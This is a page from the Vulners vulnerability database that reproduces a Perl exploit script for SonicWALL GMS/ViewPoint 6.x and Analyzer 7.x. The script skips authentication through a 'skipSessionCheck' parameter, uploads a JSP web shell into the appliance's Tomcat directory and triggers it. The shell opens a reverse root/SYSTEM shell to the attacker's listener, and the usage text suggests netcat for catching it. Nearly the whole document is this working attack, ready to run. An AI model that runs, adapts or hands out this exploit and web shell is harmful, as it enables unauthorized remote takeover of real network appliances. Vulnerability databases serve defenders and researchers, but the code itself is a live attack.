Vulners
Lucene search
SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x Remote Root/SYSTEM Exploit
#!/usr/bin/perl
##
# Title: SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x Remote Root/SYSTEM exploit
# Name: sgmsRCE.pl
# Author: Nikolas Sotiriu (lofi) <lofi[at]sotiriu.de>
#
# Use it only for education or ethical pentesting! The author accepts
# no liability for damage caused by this tool.
#
##
use strict;
use HTTP::Request::Common qw(POST);
use LWP::UserAgent;
use LWP::Protocol::https;
use Getopt::Std;
my %args;
getopt('hlp:', \%args);
my $victim = $args{h} || usage();
my $lip = $args{l};
my $lport = $args{p};
my $detect = $args{d};
my $shellname = "cbs.jsp";
banner();
my $gms_path;
my $target;
my $sysshell;
my $agent = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0,},);
$agent->agent("Mozilla/5.0 (X11; Linux x86_64; rv:11.0) Gecko/20100101 Firefox/11.0");
# Place your Proxy here if needed
#$agent->proxy(['http', 'https'], 'http://localhost:8080/');
print "[+] Checking host ...\n";
my $request = POST "$victim/appliance/applianceMainPage?skipSessionCheck=1",
Content_Type => 'application/x-www-form-urlencoded; charset=UTF-8',
Content => [ num => "123456",
action => "show_diagnostics",
task => "search",
item => "application_log",
criteria => "*.*",
width => "500",
];
my $result = $agent->request($request);
if ($result->is_success) {
print "[+] Host looks vulnerable ...\n";
} else {
print "[-] Error while connecting ... $result->status_line\n";
exit(0);
}
my @lines=split("\n",$result->content);
foreach my $line (@lines) {
if ($line =~ /OPTION VALUE=/) {
my @a=split("\"", $line);
if ($a[1] =~ m/logs/i) {
my @b=split(/logs/i,$a[1]);
$gms_path=$b[0];
}
if ($gms_path ne "") {
print "[+] GMS Path: $gms_path\n";
last;
} else {
next;
}
}
}
if ($gms_path eq "") {
print "[-] Couldn't get the GMS path ... Maybe not vulnerable\n";
exit(0);
}
if ($gms_path =~ m/^\//) {
$target="UNX";
$gms_path=$gms_path."Tomcat/webapps/appliance/";
$sysshell="/bin/sh";
print "[+] Target ist Unix...\n";
} else {
$target="WIN";
$gms_path=$gms_path."Tomcat\\webapps\\appliance\\";
$sysshell="cmd.exe";
print "[+] Target ist Windows...\n";
}
&_writing_shell;
if (!$detect) {
print "[+] Uploading shell ...\n";
my $request = POST "$victim/appliance/applianceMainPage?skipSessionCheck=1",
Content_Type => 'multipart/form-data',
Content => [ action => "file_system",
task => "uploadFile",
searchFolder => "$gms_path",
uploadFileName => ["$shellname"]
];
my $result = $agent->request($request);
if ($result->is_success) {
print "[+] Upload completed ...\n";
} else {
print "[-] Error while connecting ... $result->status_line\n";
exit(0);
}
unlink("$shellname");
print "[+] Spawning remote root/system shell ...\n";
my $result = $agent->get("$victim/appliance/$shellname");
if ($result->is_success) {
print "[+] Have fun ...\n";
} else {
print "[-] Error while connecting ... $result->status_line\n";
exit(0);
}
}
sub _writing_shell {
open FILE, ">", "$shellname" or die $!;
print FILE << "EOF";
<%\@page import="java.lang.*"%>
<%\@page import="java.util.*"%>
<%\@page import="java.io.*"%>
<%\@page import="java.net.*"%>
<%
class StreamConnector extends Thread
{
InputStream is;
OutputStream os;
StreamConnector( InputStream is, OutputStream os )
{
this.is = is;
this.os = os;
}
public void run()
{
BufferedReader in = null;
BufferedWriter out = null;
try
{
in = new BufferedReader( new InputStreamReader( this.is ) );
out = new BufferedWriter( new OutputStreamWriter( this.os ) );
char buffer[] = new char[8192];
int length;
while( ( length = in.read( buffer, 0, buffer.length ) ) > 0 )
{
out.write( buffer, 0, length );
out.flush();
}
} catch( Exception e ){}
try
{
if( in != null )
in.close();
if( out != null )
out.close();
} catch( Exception e ){}
}
}
try
{
Socket socket = new Socket( "$lip", $lport );
Process process = Runtime.getRuntime().exec( "$sysshell" );
( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
} catch( Exception e ) {}
%>
EOF
close(FILE);
}
sub usage {
print "\n";
print " $0 - SonicWALL GMS/VIEWPOINT/Analyzer Remote Root/SYSTEM exploit\n";
print "====================================================================\n\n";
print " Usage:\n";
print " $0 -h <http://victim> -l <yourip> -p <yourport>\n";
print " Notes:\n";
print " Start your netcat listener <nc -lp 4444>\n";
print " -d only checks if the Host is vulnerable\n";
print "\n";
print " Author:\n";
print " Nikolas Sotiriu (lofi)\n";
print " url: www.sotiriu.de\n";
print " mail: lofi[at]sotiriu.de\n";
print "\n";
exit(1);
}
sub banner {
print STDERR << "EOF";
--------------------------------------------------------------------------------
SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x Remote Root/SYSTEM exploit
--------------------------------------------------------------------------------
EOF
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1